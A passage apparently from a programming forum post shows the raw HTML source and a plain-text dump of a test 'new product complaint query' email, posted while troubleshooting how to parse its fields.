  |&amp;lt;style&amp;gt;&amp;lt;!--‚Äπcrlf‚Ä∫|
  |/* Font Definitions */‚Äπcrlf‚Ä∫|
  |@font-face‚Äπcrlf‚Ä∫|
  |‚Äπtb‚Ä∫{font-family:"Cambria Math";‚Äπcrlf‚Ä∫|
  |‚Äπtb‚Ä∫panose-1:2 4 5 3 5 4 6 3 2 4;}‚Äπcrlf‚Ä∫|
  |@font-face‚Äπcrlf‚Ä∫|
  |‚Äπtb‚Ä∫{font-family:Calibri;‚Äπcrlf‚Ä∫|
  |‚Äπtb‚Ä∫panose-1:2 15 5 2 2 2 4 3 2 4;}‚Äπcrlf‚Ä∫|
  |/* Style Definitions */‚Äπcrlf‚Ä∫|
  |p.MsoNormal, li.MsoNormal, div.MsoNormal‚Äπcrlf‚Ä∫|
  |‚Äπtb‚Ä∫{margin:0cm;‚Äπcrlf‚Ä∫|
  |‚Äπtb‚Ä∫margin-bottom:.0001pt;‚Äπcrlf‚Ä∫|
  |‚Äπtb‚Ä∫font-size:11.0pt;‚Äπcrlf‚Ä∫|
  |‚Äπtb‚Ä∫font-family:"Calibri",sans-serif;}‚Äπcrlf‚Ä∫|
  |a:link, span.MsoHyperlink‚Äπcrlf‚Ä∫|
  |‚Äπtb‚Ä∫{mso-style-priority:99;‚Äπcrlf‚Ä∫|
  |‚Äπtb‚Ä∫color:blue;‚Äπcrlf‚Ä∫|
  |‚Äπtb‚Ä∫text-decoration:underline;}‚Äπcrlf‚Ä∫|
  |a:visited, span.MsoHyperlinkFollowed‚Äπcrlf‚Ä∫|
  |‚Äπtb‚Ä∫{mso-style-priority:99;‚Äπcrlf‚Ä∫|
  |‚Äπtb‚Ä∫color:purple;‚Äπcrlf‚Ä∫|
  |‚Äπtb‚Ä∫text-decoration:underline;}‚Äπcrlf‚Ä∫|
  |p.msonormal0, li.msonormal0, div.msonormal0‚Äπcrlf‚Ä∫|
  |‚Äπtb‚Ä∫{mso-style-name:msonormal;‚Äπcrlf‚Ä∫|
  |‚Äπtb‚Ä∫mso-margin-top-alt:auto;‚Äπcrlf‚Ä∫|
  |‚Äπtb‚Ä∫margin-right:0cm;‚Äπcrlf‚Ä∫|
  |‚Äπtb‚Ä∫mso-margin-bottom-alt:auto;‚Äπcrlf‚Ä∫|
  |‚Äπtb‚Ä∫margin-left:0cm;‚Äπcrlf‚Ä∫|
  |‚Äπtb‚Ä∫font-size:11.0pt;‚Äπcrlf‚Ä∫|
  |‚Äπtb‚Ä∫font-family:"Calibri",sans-serif;}‚Äπcrlf‚Ä∫|
  |span.preheader‚Äπcrlf‚Ä∫|
  |‚Äπtb‚Ä∫{mso-style-name:preheader;}‚Äπcrlf‚Ä∫|
  |span.EmailStyle19‚Äπcrlf‚Ä∫|
  |‚Äπtb‚Ä∫{mso-style-type:personal;‚Äπcrlf‚Ä∫|
  |‚Äπtb‚Ä∫font-family:"Calibri",sans-serif;‚Äπcrlf‚Ä∫|
  |‚Äπtb‚Ä∫color:windowtext;}‚Äπcrlf‚Ä∫|
  |span.EmailStyle22‚Äπcrlf‚Ä∫|
  |‚Äπtb‚Ä∫{mso-style-type:personal-reply;‚Äπcrlf‚Ä∫|
  |‚Äπtb‚Ä∫font-family:"Calibri",sans-serif;‚Äπcrlf‚Ä∫|
  |‚Äπtb‚Ä∫color:windowtext;}‚Äπcrlf‚Ä∫|
  |.MsoChpDefault‚Äπcrlf‚Ä∫|
  |‚Äπtb‚Ä∫{mso-style-type:export-only;‚Äπcrlf‚Ä∫|
  |‚Äπtb‚Ä∫font-size:10.0pt;}‚Äπcrlf‚Ä∫|
  |@page WordSection1‚Äπcrlf‚Ä∫|
  |‚Äπtb‚Ä∫{size:612.0pt 792.0pt;‚Äπcrlf‚Ä∫|
  |‚Äπtb‚Ä∫margin:72.0pt 72.0pt 72.0pt 72.0pt;}‚Äπcrlf‚Ä∫|
  |div.WordSection1‚Äπcrlf‚Ä∫|
  |‚Äπtb‚Ä∫{page:WordSection1;}‚Äπcrlf‚Ä∫|
  |--&amp;gt;&amp;lt;/style&amp;gt;&amp;lt;!--[if gte mso 9]&amp;gt;&amp;lt;xml&amp;gt;‚Äπcrlf‚Ä∫|
  |&amp;lt;o:shapedefaults v:ext="edit" spidmax="1026" /&amp;gt;‚Äπcrlf‚Ä∫|
  |&amp;lt;/xml&amp;gt;&amp;lt;![endif]--&amp;gt;&amp;lt;!--[if gte mso 9]&amp;gt;&amp;lt;xml&amp;gt;‚Äπcrlf‚Ä∫|
  |&amp;lt;o:shapelayout v:ext="edit"&amp;gt;‚Äπcrlf‚Ä∫|
  |&amp;lt;o:idmap v:ext="edit" data="1" /&amp;gt;‚Äπcrlf‚Ä∫|
  |&amp;lt;/o:shapelayout&amp;gt;&amp;lt;/xml&amp;gt;&amp;lt;![endif]--&amp;gt;‚Äπcrlf‚Ä∫|
  |&amp;lt;/head&amp;gt;‚Äπcrlf‚Ä∫|
  |&amp;lt;body bgcolor="#F6F6F6" lang="EN-US" link="blue" vlink="purple"&amp;gt;&amp;lt;pre&amp;gt;&amp;lt;div style="background-color:#F|
  |FEB9C; width:100%; max-width:1040px; border-style: solid; border-color:#9C6500; border-width:1pt; pa|
  |dding:2pt; font-size:10pt; line-height:12pt; font-family:'Calibri'; color:Black; text-align: left;"&amp;gt;|
  |&amp;lt;span style="color:#9C6500; font-weight:bold;"&amp;gt;CAUTION:&amp;lt;/span&amp;gt;This email originated from outside of |
  |the Vifor Pharma Group organisation. Do not click on links or open attachments unless you recognise |
  |the sender and know the content is safe.&amp;lt;/div&amp;gt;‚Äπcrlf‚Ä∫|
  |&amp;lt;/pre&amp;gt;‚Äπcrlf‚Ä∫|
  |&amp;lt;div class="WordSection1"&amp;gt;‚Äπcrlf‚Ä∫|
  |&amp;lt;p class="MsoNormal"&amp;gt;&amp;lt;o:p&amp;gt;&amp;amp;nbsp;&amp;lt;/o:p&amp;gt;&amp;lt;/p&amp;gt;‚Äπcrlf‚Ä∫|
  |&amp;lt;p class="MsoNormal"&amp;gt;&amp;lt;o:p&amp;gt;&amp;amp;nbsp;&amp;lt;/o:p&amp;gt;&amp;lt;/p&amp;gt;‚Äπcrlf‚Ä∫|
  |&amp;lt;p class="MsoNormal"&amp;gt;&amp;lt;o:p&amp;gt;&amp;amp;nbsp;&amp;lt;/o:p&amp;gt;&amp;lt;/p&amp;gt;‚Äπcrlf‚Ä∫|
  |&amp;lt;div&amp;gt;‚Äπcrlf‚Ä∫|
  |&amp;lt;div style="border:none;border-top:solid #E1E1E1 1.0pt;padding:3.0pt 0cm 0cm 0cm"&amp;gt;‚Äπcrlf‚Ä∫|
  |&amp;lt;p class="MsoNormal"&amp;gt;&amp;lt;b&amp;gt;From:&amp;lt;/b&amp;gt; Info GM &amp;amp;lt;&amp;lt;a href="mailto:noreply@info|
  |.com"&amp;gt;noreply@info.com&amp;lt;/a&amp;gt;&amp;amp;gt;‚Äπcrlf‚Ä∫|
  |&amp;lt;br&amp;gt;‚Äπcrlf‚Ä∫|
  |&amp;lt;b&amp;gt;Sent:&amp;lt;/b&amp;gt; 19 February 2020 16:20&amp;lt;br&amp;gt;‚Äπcrlf‚Ä∫|
  |&amp;lt;b&amp;gt;To:&amp;lt;/b&amp;gt; Info1 &amp;amp;lt;&amp;lt;a href="mailto:infor1@info.com"&amp;gt;pharma|
  |info2@info.com&amp;lt;/a&amp;gt;&amp;amp;gt;&amp;lt;br&amp;gt;‚Äπcrlf‚Ä∫|
  |&amp;lt;b&amp;gt;Cc:&amp;lt;/b&amp;gt; GM &amp;amp;lt;&amp;lt;a href="mailto:info@info.com"&amp;gt;GlobalMedInfo@info|
  |.com&amp;lt;/a&amp;gt;&amp;amp;gt;&amp;lt;br&amp;gt;‚Äπcrlf‚Ä∫|
  |&amp;lt;b&amp;gt;Subject:&amp;lt;/b&amp;gt; New query received&amp;lt;o:p&amp;gt;&amp;lt;/o:p&amp;gt;&amp;lt;/p&amp;gt;‚Äπcrlf‚Ä∫|
  |&amp;lt;/div&amp;gt;‚Äπcrlf‚Ä∫|
  |&amp;lt;/div&amp;gt;‚Äπcrlf‚Ä∫|
  |&amp;lt;p class="MsoNormal"&amp;gt;&amp;lt;o:p&amp;gt;&amp;amp;nbsp;&amp;lt;/o:p&amp;gt;&amp;lt;/p&amp;gt;‚Äπcrlf‚Ä∫|
  |&amp;lt;table class="MsoNormalTable" border="0" cellspacing="0" cellpadding="0" width="100%" style="width:1|
  |00.0%;background:#F6F6F6"&amp;gt;‚Äπcrlf‚Ä∫|
  |&amp;lt;tbody&amp;gt;‚Äπcrlf‚Ä∫|
  |&amp;lt;tr&amp;gt;‚Äπcrlf‚Ä∫|
  |&amp;lt;td valign="top" style="padding:0cm 0cm 0cm 0cm"&amp;gt;‚Äπcrlf‚Ä∫|
  |&amp;lt;p class="MsoNormal"&amp;gt;&amp;lt;span style="font-size:10.5pt;font-family:&amp;amp;quot;Arial&amp;amp;quot;,sans-serif"&amp;gt;&amp;amp;nbsp;&amp;lt;|
  |o:p&amp;gt;&amp;lt;/o:p&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/p&amp;gt;‚Äπcrlf‚Ä∫|
  |&amp;lt;/td&amp;gt;‚Äπcrlf‚Ä∫|
  |&amp;lt;td width="580" valign="top" style="width:435.0pt;padding:7.5pt 7.5pt 7.5pt 7.5pt"&amp;gt;‚Äπcrlf‚Ä∫|
  |&amp;lt;div&amp;gt;‚Äπcrlf‚Ä∫|
  |&amp;lt;p class="MsoNormal"&amp;gt;&amp;lt;span class="preheader"&amp;gt;&amp;lt;span style="font-size:10.5pt;font-family:&amp;amp;quot;Arial&amp;amp;q|
  |uot;,sans-serif"&amp;gt;New query received&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span style="font-size:10.5pt;font-family:&amp;amp;quot;Ari|
  |al&amp;amp;quot;,sans-serif"&amp;gt;‚Äπcrlf‚Ä∫|
  |&amp;lt;o:p&amp;gt;&amp;lt;/o:p&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/p&amp;gt;‚Äπcrlf‚Ä∫|
  |&amp;lt;table class="MsoNormalTable" border="0" cellspacing="3" cellpadding="0" width="100%" style="width:1|
  |00.0%;background:white;border-radius: 3px"&amp;gt;‚Äπcrlf‚Ä∫|
  |&amp;lt;tbody&amp;gt;‚Äπcrlf‚Ä∫|
  |&amp;lt;tr&amp;gt;‚Äπcrlf‚Ä∫|
  |&amp;lt;td valign="top" style="padding:15.0pt 15.0pt 15.0pt 15.0pt;box-sizing: border-box"&amp;gt;‚Äπcrlf‚Ä∫|
  |&amp;lt;table class="MsoNormalTable" border="0" cellspacing="0" cellpadding="0" width="100%" style="width:1|
  |00.0%;box-sizing: border-box"&amp;gt;‚Äπcrlf‚Ä∫|
  |&amp;lt;tbody&amp;gt;‚Äπcrlf‚Ä∫|
  |&amp;lt;tr&amp;gt;‚Äπcrlf‚Ä∫|
  |&amp;lt;td valign="top" style="padding:0cm 0cm 0cm 0cm"&amp;gt;‚Äπcrlf‚Ä∫|
  |&amp;lt;p style="mso-margin-top-alt:0cm;margin-right:0cm;margin-bottom:11.25pt;margin-left:0cm"&amp;gt;‚Äπcrlf‚Ä∫|
  |&amp;lt;span style="font-size:10.5pt;font-family:&amp;amp;quot;Arial&amp;amp;quot;,sans-serif"&amp;gt;New product complaint query |
  |received from info.com&amp;lt;o:p&amp;gt;&amp;lt;/o:p&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/p&amp;gt;‚Äπcrlf‚Ä∫|
  |&amp;lt;p style="mso-margin-top-alt:0cm;margin-right:0cm;margin-bottom:11.25pt;margin-left:0cm"&amp;gt;‚Äπcrlf‚Ä∫|
  |&amp;lt;span style="font-size:10.5pt;font-family:&amp;amp;quot;Arial&amp;amp;quot;,sans-serif"&amp;gt;The submitted details are be|
  |low:&amp;lt;o:p&amp;gt;&amp;lt;/o:p&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/p&amp;gt;‚Äπcrlf‚Ä∫|
  |&amp;lt;table class="MsoNormalTable" border="0" cellspacing="0" cellpadding="0" width="100%" style="width:1|
  |00.0%;background:white;box-sizing: border-box"&amp;gt;‚Äπcrlf‚Ä∫|
  |&amp;lt;tbody&amp;gt;‚Äπcrlf‚Ä∫|
  |&amp;lt;tr&amp;gt;‚Äπcrlf‚Ä∫|
  |&amp;lt;td valign="top" style="padding:0cm 0cm 11.25pt 0cm"&amp;gt;‚Äπcrlf‚Ä∫|
  |&amp;lt;p class="MsoNormal"&amp;gt;&amp;lt;span style="font-size:10.5pt;font-family:&amp;amp;quot;Arial&amp;amp;quot;,sans-serif"&amp;gt;Region|
  |‚Äπcrlf‚Ä∫|
  |&amp;lt;o:p&amp;gt;&amp;lt;/o:p&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/p&amp;gt;‚Äπcrlf‚Ä∫|
  |&amp;lt;/td&amp;gt;‚Äπcrlf‚Ä∫|
  |&amp;lt;td valign="top" style="padding:0cm 0cm 11.25pt 0cm"&amp;gt;‚Äπcrlf‚Ä∫|
  |&amp;lt;p class="MsoNormal"&amp;gt;&amp;lt;span style="font-size:10.5pt;font-family:&amp;amp;quot;Arial&amp;amp;quot;,sans-serif"&amp;gt;Europe|
  |‚Äπcrlf‚Ä∫|
  |&amp;lt;o:p&amp;gt;&amp;lt;/o:p&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/p&amp;gt;‚Äπcrlf‚Ä∫|
  |&amp;lt;/td&amp;gt;‚Äπcrlf‚Ä∫|
  |&amp;lt;/tr&amp;gt;‚Äπcrlf‚Ä∫|
  |&amp;lt;tr&amp;gt;‚Äπcrlf‚Ä∫|
  |&amp;lt;td valign="top" style="padding:0cm 0cm 11.25pt 0cm"&amp;gt;‚Äπcrlf‚Ä∫|
  |&amp;lt;p class="MsoNormal"&amp;gt;&amp;lt;span style="font-size:10.5pt;font-family:&amp;amp;quot;Arial&amp;amp;quot;,sans-serif"&amp;gt;Country|
  |‚Äπcrlf‚Ä∫|
  |&amp;lt;o:p&amp;gt;&amp;lt;/o:p&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/p&amp;gt;‚Äπcrlf‚Ä∫|
  |&amp;lt;/td&amp;gt;‚Äπcrlf‚Ä∫|
  |&amp;lt;td valign="top" style="padding:0cm 0cm 11.25pt 0cm"&amp;gt;‚Äπcrlf‚Ä∫|
  |&amp;lt;p class="MsoNormal"&amp;gt;&amp;lt;span style="font-size:10.5pt;font-family:&amp;amp;quot;Arial&amp;amp;quot;,sans-serif"&amp;gt;Switzer|
  |land‚Äπcrlf‚Ä∫|
  |&amp;lt;o:p&amp;gt;&amp;lt;/o:p&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/p&amp;gt;‚Äπcrlf‚Ä∫|
  |&amp;lt;/td&amp;gt;‚Äπcrlf‚Ä∫|
  |&amp;lt;/tr&amp;gt;‚Äπcrlf‚Ä∫|
  |&amp;lt;tr&amp;gt;‚Äπcrlf‚Ä∫|
  |&amp;lt;td valign="top" style="padding:0cm 0cm 11.25pt 0cm"&amp;gt;‚Äπcrlf‚Ä∫|
  |&amp;lt;p class="MsoNormal"&amp;gt;&amp;lt;span style="font-size:10.5pt;font-family:&amp;amp;quot;Arial&amp;amp;quot;,sans-serif"&amp;gt;Title|
  |‚Äπcrlf‚Ä∫|
  |&amp;lt;o:p&amp;gt;&amp;lt;/o:p&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/p&amp;gt;‚Äπcrlf‚Ä∫|
  |&amp;lt;/td&amp;gt;‚Äπcrlf‚Ä∫|
  |&amp;lt;td valign="top" style="padding:0cm 0cm 11.25pt 0cm"&amp;gt;‚Äπcrlf‚Ä∫|
  |&amp;lt;p class="MsoNormal"&amp;gt;&amp;lt;span style="font-size:10.5pt;font-family:&amp;amp;quot;Arial&amp;amp;quot;,sans-serif"&amp;gt;Ms|
  |‚Äπcrlf‚Ä∫|
  |&amp;lt;o:p&amp;gt;&amp;lt;/o:p&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/p&amp;gt;‚Äπcrlf‚Ä∫|
  |&amp;lt;/td&amp;gt;‚Äπcrlf‚Ä∫|
  |&amp;lt;/tr&amp;gt;‚Äπcrlf‚Ä∫|
  |&amp;lt;tr&amp;gt;‚Äπcrlf‚Ä∫|
  |&amp;lt;td valign="top" style="padding:0cm 0cm 11.25pt 0cm"&amp;gt;‚Äπcrlf‚Ä∫|
  |&amp;lt;p class="MsoNormal"&amp;gt;&amp;lt;span style="font-size:10.5pt;font-family:&amp;amp;quot;Arial&amp;amp;quot;,sans-serif"&amp;gt;First n|
  |ame‚Äπcrlf‚Ä∫|
  |&amp;lt;o:p&amp;gt;&amp;lt;/o:p&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/p&amp;gt;‚Äπcrlf‚Ä∫|
  |&amp;lt;/td&amp;gt;‚Äπcrlf‚Ä∫|
  |&amp;lt;td valign="top" style="padding:0cm 0cm 11.25pt 0cm"&amp;gt;‚Äπcrlf‚Ä∫|
  |&amp;lt;p class="MsoNormal"&amp;gt;&amp;lt;span style="font-size:10.5pt;font-family:&amp;amp;quot;Arial&amp;amp;quot;,sans-serif"&amp;gt;Joe|
  |‚Äπcrlf‚Ä∫|
  |&amp;lt;o:p&amp;gt;&amp;lt;/o:p&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/p&amp;gt;‚Äπcrlf‚Ä∫|
  |&amp;lt;/td&amp;gt;‚Äπcrlf‚Ä∫|
  |&amp;lt;/tr&amp;gt;‚Äπcrlf‚Ä∫|
  |&amp;lt;tr&amp;gt;‚Äπcrlf‚Ä∫|
  |&amp;lt;td valign="top" style="padding:0cm 0cm 11.25pt 0cm"&amp;gt;‚Äπcrlf‚Ä∫|
  |&amp;lt;p class="MsoNormal"&amp;gt;&amp;lt;span style="font-size:10.5pt;font-family:&amp;amp;quot;Arial&amp;amp;quot;,sans-serif"&amp;gt;Last na|
  |me‚Äπcrlf‚Ä∫|
  |&amp;lt;o:p&amp;gt;&amp;lt;/o:p&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/p&amp;gt;‚Äπcrlf‚Ä∫|
  |&amp;lt;/td&amp;gt;‚Äπcrlf‚Ä∫|
  |&amp;lt;td valign="top" style="padding:0cm 0cm 11.25pt 0cm"&amp;gt;‚Äπcrlf‚Ä∫|
  |&amp;lt;p class="MsoNormal"&amp;gt;&amp;lt;span style="font-size:10.5pt;font-family:&amp;amp;quot;Arial&amp;amp;quot;,sans-serif"&amp;gt;Doe|
  |‚Äπcrlf‚Ä∫|
  |&amp;lt;o:p&amp;gt;&amp;lt;/o:p&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/p&amp;gt;‚Äπcrlf‚Ä∫|
  |&amp;lt;/td&amp;gt;‚Äπcrlf‚Ä∫|
  |&amp;lt;/tr&amp;gt;‚Äπcrlf‚Ä∫|
  |&amp;lt;tr&amp;gt;‚Äπcrlf‚Ä∫|
  |&amp;lt;td valign="top" style="padding:0cm 0cm 11.25pt 0cm"&amp;gt;‚Äπcrlf‚Ä∫|
  |&amp;lt;p class="MsoNormal"&amp;gt;&amp;lt;span style="font-size:10.5pt;font-family:&amp;amp;quot;Arial&amp;amp;quot;,sans-serif"&amp;gt;Email|
  |‚Äπcrlf‚Ä∫|
  |&amp;lt;o:p&amp;gt;&amp;lt;/o:p&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/p&amp;gt;‚Äπcrlf‚Ä∫|
  |&amp;lt;/td&amp;gt;‚Äπcrlf‚Ä∫|
  |&amp;lt;td valign="top" style="padding:0cm 0cm 11.25pt 0cm"&amp;gt;‚Äπcrlf‚Ä∫|
  |&amp;lt;p class="MsoNormal"&amp;gt;&amp;lt;span style="font-size:10.5pt;font-family:&amp;amp;quot;Arial&amp;amp;quot;,sans-serif"&amp;gt;&amp;lt;a href|
  |="mailto:Joe.Doe.ext@info.com"&amp;gt;Joe.Doe.ext@info.com&amp;lt;/a&amp;gt;‚Äπcrlf‚Ä∫|
  |&amp;lt;o:p&amp;gt;&amp;lt;/o:p&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/p&amp;gt;‚Äπcrlf‚Ä∫|
  |&amp;lt;/td&amp;gt;‚Äπcrlf‚Ä∫|
  |&amp;lt;/tr&amp;gt;‚Äπcrlf‚Ä∫|
  |&amp;lt;tr&amp;gt;‚Äπcrlf‚Ä∫|
  |&amp;lt;td valign="top" style="padding:0cm 0cm 11.25pt 0cm"&amp;gt;‚Äπcrlf‚Ä∫|
  |&amp;lt;p class="MsoNormal"&amp;gt;&amp;lt;span style="font-size:10.5pt;font-family:&amp;amp;quot;Arial&amp;amp;quot;,sans-serif"&amp;gt;Contact|
  | number‚Äπcrlf‚Ä∫|
  |&amp;lt;o:p&amp;gt;&amp;lt;/o:p&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/p&amp;gt;‚Äπcrlf‚Ä∫|
  |&amp;lt;/td&amp;gt;‚Äπcrlf‚Ä∫|
  |&amp;lt;td valign="top" style="padding:0cm 0cm 11.25pt 0cm"&amp;gt;&amp;lt;/td&amp;gt;‚Äπcrlf‚Ä∫|
  |&amp;lt;/tr&amp;gt;‚Äπcrlf‚Ä∫|
  |&amp;lt;tr&amp;gt;‚Äπcrlf‚Ä∫|
  |&amp;lt;td valign="top" style="padding:0cm 0cm 11.25pt 0cm"&amp;gt;‚Äπcrlf‚Ä∫|
  |&amp;lt;p class="MsoNormal"&amp;gt;&amp;lt;span style="font-size:10.5pt;font-family:&amp;amp;quot;Arial&amp;amp;quot;,sans-serif"&amp;gt;Role|
  |‚Äπcrlf‚Ä∫|
  |&amp;lt;o:p&amp;gt;&amp;lt;/o:p&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/p&amp;gt;‚Äπcrlf‚Ä∫|
  |&amp;lt;/td&amp;gt;‚Äπcrlf‚Ä∫|
  |&amp;lt;td valign="top" style="padding:0cm 0cm 11.25pt 0cm"&amp;gt;‚Äπcrlf‚Ä∫|
  |&amp;lt;p class="MsoNormal"&amp;gt;&amp;lt;span style="font-size:10.5pt;font-family:&amp;amp;quot;Arial&amp;amp;quot;,sans-serif"&amp;gt;Other|
  |‚Äπcrlf‚Ä∫|
  |&amp;lt;o:p&amp;gt;&amp;lt;/o:p&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/p&amp;gt;‚Äπcrlf‚Ä∫|
  |&amp;lt;/td&amp;gt;‚Äπcrlf‚Ä∫|
  |&amp;lt;/tr&amp;gt;‚Äπcrlf‚Ä∫|
  |&amp;lt;tr&amp;gt;‚Äπcrlf‚Ä∫|
  |&amp;lt;td valign="top" style="padding:0cm 0cm 11.25pt 0cm"&amp;gt;‚Äπcrlf‚Ä∫|
  |&amp;lt;p class="MsoNormal"&amp;gt;&amp;lt;span style="font-size:10.5pt;font-family:&amp;amp;quot;Arial&amp;amp;quot;,sans-serif"&amp;gt;Institu|
  |tion‚Äπcrlf‚Ä∫|
  |&amp;lt;o:p&amp;gt;&amp;lt;/o:p&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/p&amp;gt;‚Äπcrlf‚Ä∫|
  |&amp;lt;/td&amp;gt;‚Äπcrlf‚Ä∫|
  |&amp;lt;td valign="top" style="padding:0cm 0cm 11.25pt 0cm"&amp;gt;&amp;lt;/td&amp;gt;‚Äπcrlf‚Ä∫|
  |&amp;lt;/tr&amp;gt;‚Äπcrlf‚Ä∫|
  |&amp;lt;tr&amp;gt;‚Äπcrlf‚Ä∫|
  |&amp;lt;td valign="top" style="padding:0cm 0cm 11.25pt 0cm"&amp;gt;‚Äπcrlf‚Ä∫|
  |&amp;lt;p class="MsoNormal"&amp;gt;&amp;lt;span style="font-size:10.5pt;font-family:&amp;amp;quot;Arial&amp;amp;quot;,sans-serif"&amp;gt;Product|
  |‚Äπcrlf‚Ä∫|
  |&amp;lt;o:p&amp;gt;&amp;lt;/o:p&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/p&amp;gt;‚Äπcrlf‚Ä∫|
  |&amp;lt;/td&amp;gt;‚Äπcrlf‚Ä∫|
  |&amp;lt;td valign="top" style="padding:0cm 0cm 11.25pt 0cm"&amp;gt;‚Äπcrlf‚Ä∫|
  |&amp;lt;p class="MsoNormal"&amp;gt;&amp;lt;span style="font-size:10.5pt;font-family:&amp;amp;quot;Arial&amp;amp;quot;,sans-serif"&amp;gt;TEST pr|
  |oduct‚Äπcrlf‚Ä∫|
  |&amp;lt;o:p&amp;gt;&amp;lt;/o:p&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/p&amp;gt;‚Äπcrlf‚Ä∫|
  |&amp;lt;/td&amp;gt;‚Äπcrlf‚Ä∫|
  |&amp;lt;/tr&amp;gt;‚Äπcrlf‚Ä∫|
  |&amp;lt;tr&amp;gt;‚Äπcrlf‚Ä∫|
  |&amp;lt;td colspan="2" valign="top" style="padding:0cm 0cm 11.25pt 0cm"&amp;gt;‚Äπcrlf‚Ä∫|
  |&amp;lt;p class="MsoNormal"&amp;gt;&amp;lt;span style="font-size:10.5pt;font-family:&amp;amp;quot;Arial&amp;amp;quot;,sans-serif"&amp;gt;Message|
  |‚Äπcrlf‚Ä∫|
  |&amp;lt;o:p&amp;gt;&amp;lt;/o:p&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/p&amp;gt;‚Äπcrlf‚Ä∫|
  |&amp;lt;/td&amp;gt;‚Äπcrlf‚Ä∫|
  |&amp;lt;/tr&amp;gt;‚Äπcrlf‚Ä∫|
  |&amp;lt;tr&amp;gt;‚Äπcrlf‚Ä∫|
  |&amp;lt;td colspan="2" valign="top" style="padding:0cm 0cm 11.25pt 0cm"&amp;gt;‚Äπcrlf‚Ä∫|
  |&amp;lt;p class="MsoNormal"&amp;gt;&amp;lt;i&amp;gt;&amp;lt;span style="font-size:10.5pt;font-family:&amp;amp;quot;Arial&amp;amp;quot;,sans-serif"&amp;gt;TEST|
  | question - please confirm receipt if received.‚Äπcrlf‚Ä∫|
  |&amp;lt;o:p&amp;gt;&amp;lt;/o:p&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/i&amp;gt;&amp;lt;/p&amp;gt;‚Äπcrlf‚Ä∫|
  |&amp;lt;/td&amp;gt;‚Äπcrlf‚Ä∫|
  |&amp;lt;/tr&amp;gt;‚Äπcrlf‚Ä∫|
  |&amp;lt;tr&amp;gt;‚Äπcrlf‚Ä∫|
  |&amp;lt;td colspan="2" valign="top" style="padding:0cm 0cm 0cm 0cm"&amp;gt;‚Äπcrlf‚Ä∫|
  |&amp;lt;p class="MsoNormal" align="right" style="text-align:right"&amp;gt;&amp;lt;span style="font-size:10.5pt;font-famil|
  |y:&amp;amp;quot;Arial&amp;amp;quot;,sans-serif"&amp;gt;ALL-ALL-001366‚Äπcrlf‚Ä∫|
  |&amp;lt;o:p&amp;gt;&amp;lt;/o:p&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/p&amp;gt;‚Äπcrlf‚Ä∫|
  |&amp;lt;/td&amp;gt;‚Äπcrlf‚Ä∫|
  |&amp;lt;/tr&amp;gt;‚Äπcrlf‚Ä∫|
  |&amp;lt;tr&amp;gt;‚Äπcrlf‚Ä∫|
  |&amp;lt;td colspan="2" valign="top" style="padding:0cm 0cm 0cm 0cm"&amp;gt;‚Äπcrlf‚Ä∫|
  |&amp;lt;p class="MsoNormal" align="right" style="text-align:right"&amp;gt;&amp;lt;span style="font-size:10.5pt;font-famil|
  |y:&amp;amp;quot;Arial&amp;amp;quot;,sans-serif"&amp;gt;JAN 2020‚Äπcrlf‚Ä∫|
  |&amp;lt;o:p&amp;gt;&amp;lt;/o:p&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/p&amp;gt;‚Äπcrlf‚Ä∫|
  |&amp;lt;/td&amp;gt;‚Äπcrlf‚Ä∫|
  |&amp;lt;/tr&amp;gt;‚Äπcrlf‚Ä∫|
  |&amp;lt;/tbody&amp;gt;‚Äπcrlf‚Ä∫|
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;I have run the tool and here it the text:&lt;/p&gt;
 &lt;p&gt;&lt;code&gt;@Tony Dallimore Here is the text `Text: |From: Info &amp;lt;noreply@info.com &amp;lt;mailto:noreply@info.com&amp;gt; &amp;gt; ‚Äπcrlf‚Ä∫|
  |Sent: 19 February 2020 16:20‚Äπcrlf‚Ä∫|
  |To: Email1 &amp;lt;email1@info.com &amp;lt;mailto:email1|
  |@info.com&amp;gt; &amp;gt;‚Äπcrlf‚Ä∫|
  |Cc: Infor &amp;lt;Info1@infor.com &amp;lt;mailto:infor1@info.com&amp;gt; &amp;gt;‚Äπcrlf‚Ä∫|
  |Subject: New query received‚Äπ2 crlf‚Ä∫|
  | ‚Äπ2 crlf‚Ä∫|
  | ‚Äπ2 crlf‚Ä∫|
  |New query received ‚Äπ2 crlf‚Ä∫|
  |New product complaint query received from info.com‚Äπ2 crlf‚Ä∫|
  |The submitted details are below:‚Äπ2 crlf‚Ä∫|
  |Region ‚Äπ2 crlf‚Ä∫|
  |Europe ‚Äπ2 crlf‚Ä∫|
  |Country ‚Äπ2 crlf‚Ä∫|
  |Switzerland ‚Äπ2 crlf‚Ä∫|
  |Title ‚Äπ2 crlf‚Ä∫|
  |Mr ‚Äπ2 crlf‚Ä∫|
  |First name ‚Äπ2 crlf‚Ä∫|
  |Joe ‚Äπ2 crlf‚Ä∫|
  |Last name ‚Äπ2 crlf‚Ä∫|
  |Doe ‚Äπ2 crlf‚Ä∫|
  |Email ‚Äπ2 crlf‚Ä∫|
